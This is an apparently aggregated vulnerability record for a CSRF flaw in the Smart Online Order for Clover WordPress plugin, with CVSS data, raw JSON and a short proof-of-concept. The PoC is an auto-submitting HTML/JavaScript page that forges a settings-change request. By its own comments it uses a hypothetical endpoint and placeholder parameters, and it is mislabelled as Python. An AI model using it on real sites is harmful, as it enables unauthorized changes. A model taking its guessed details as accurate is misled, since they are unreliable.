Security Vulnerability Report
中文
CVE-2025-15635 CVSS 4.3 MEDIUM

CVE-2025-15635

Published: 2026-04-15 17:17:00
Last Modified: 2026-04-23 15:22:54

Description

Cross-Site Request Forgery (CSRF) vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Cross Site Request Forgery.This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ZAYTECH Smart Online Order for Clover <= 1.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<html> <!-- CSRF PoC for CVE-2025-15635 --> <body> <script> // The target endpoint is hypothetical as it is not explicitly listed in the description, // but typically targets the admin-ajax.php or a specific admin page. function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://target-site.com/wp-admin/admin.php?page=clover_settings", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // Payload to change settings (example) xhr.send("action=update_clover_option&malicious_param=value"); } // Auto-submit on load window.onload = submitRequest; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15635", "sourceIdentifier": "[email protected]", "published": "2026-04-15T17:17:00.277", "lastModified": "2026-04-23T15:22:54.450", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Cross Site Request Forgery.This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/clover-online-orders/vulnerability/wordpress-smart-online-order-for-clover-plugin-1-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}